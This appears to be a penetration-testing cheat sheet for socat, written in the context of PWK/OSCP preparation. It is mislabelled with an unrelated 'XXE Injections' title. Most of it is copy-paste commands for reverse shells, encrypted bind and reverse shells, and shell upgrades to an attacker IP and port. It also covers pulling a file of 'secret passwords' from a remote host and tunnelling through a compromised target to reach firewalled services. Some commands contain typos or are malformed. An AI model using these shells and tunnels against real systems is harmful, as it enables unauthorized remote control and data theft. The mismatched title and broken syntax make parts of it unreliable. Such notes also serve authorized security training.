XXE Injections
Abusing XML Parsers
Table of Contents
Intro
I used socat heavily during pwk as it’s a powerful tool. In addition to the functionalities of netcat, with socat you can setup encrypted reverse/bind shells.
While all of this information is available in the help/manpages you still have to piece together what you want from the information provided in the documentation.
I like to approach things from a conceptual standpoint. So rather than play with syntax or reread documentation until it’s memorized, I like to prepare the commands I use most with a tool ahead of time and copy/paste them in a terminal.
This is particularly useful when time is of the essence or just for building a PoC in general.
Info
Useful Switches
- verbosity:
-d - allow multiple connections:
fork - do not verify ssl cert:
verfiy=0 - windows specific syntax:
pipes - writing to tcp socket over ipv4:
TCP4:<rhost>:<rport> - reading tcp socket over ipv4:
TCP4-LISTEN:<port> - shells:
EXEC:/bin/bash- windows specific syntax:
EXEC:cmd.exe,pipes - windows specific syntax bash:
EXEC:bash,pipes
- windows specific syntax:
Connecting To A Remote Listener Syntax
socat - TCP4:<remote server ip address>:portnumber`
As a side note, socat requires - to transfer data between STDIO and the remote host (i.e keyboard interaction)
Listening For A Connection
socat TCP4-LISTEN:<portnum> STDOUT
Root is required to bind a port below 1024.
File Transfers
Making file available for consumption
socat TCP4-LISTEN:<portnum> STDOUT
Root is required to bind a port below 1024.
Retrieving a file
socat TCP4:<remote ip>:<remote port> file:received_secret_passwords.txt,create`
Root is required to bind a port below 1024.
Shells
Reverse Shells
socat TCP4:<rhost>:rport EXEC:/bin/bash
- windows specific syntax:
socat TCP4:<rhost>:rport EXEC:cmd.exe,pipessocat TCP4:<rhost>:rport EXEC:bash,pipes
Encrypted Bind Shells
See ssl certificates certificates for creating a .pem file. target:
sudo socat OPENSSL-LISTEN:443,cert=bind_shell.pem,verify=0,fork EXEC:/bin/bash
attacker:
socat - OPENSSL:<remote ip>:443,verify=0
Encrypted Reverse Shells
See ssl certificates certificates for creating a .pem file. target:
socat OPENSSL:<remote ip>:<remote port>,verify=0 EXEC:/bin/bash
attacker:
socat -d -d OPENSSL-LISTEN:<remote port>,cert=bind.pem,verify=0,fork STDOUT
Upgrading Reverse Shells
Listening Side:
socat file:`tty`,raw,echo=0 tcp-listen:4444
Target Side:
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444
Networking
Brittle port forwarding(Not session based)
This is most useful for exposing a service running on local host for example.
your machine:
socat -v TCP4:10000 TCP4-LISTEN:8000
target machine:
socat TCP4:<my ip>:10000 TCP4:<internal webserver>:<internal webserver port>
Local Tunneling
On a target we listen on port 12080 and forward traffic to port 8080, which presumably is behind a firewall or otherwise unreachable. So now from our attack box we can send to traffic to port 8080 via port 12080.
socat TCP-LISTEN:12080,reuseaddr,fork TCP:0.0.0.0:8080 &
